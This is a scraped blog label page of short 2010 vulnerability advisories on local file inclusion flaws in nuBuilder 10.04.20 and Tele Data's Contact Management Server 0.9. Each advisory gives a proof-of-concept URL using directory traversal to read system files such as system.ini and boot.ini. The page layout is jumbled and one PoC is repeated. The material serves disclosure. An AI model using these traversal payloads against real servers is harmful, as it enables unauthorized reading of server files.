A local file inclusion vulnerability in nuBuilder 10.04.20 can be exploited to include arbitrary files.
PoC
http://localhost/nubuilder-10.04.20/productionnu2/fileuploader.php?dir=../../../../../../../../windows/system.ini
Showing posts with label LFI. Show all posts
Showing posts with label LFI. Show all posts
Monday, July 5, 2010
Sunday, May 23, 2010
Tele Data's Contact Management Server 0.9 Local File Inclusion
A local file inclusion vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to read files from the server file system.
PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini
PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini
Subscribe to:
Posts (Atom)
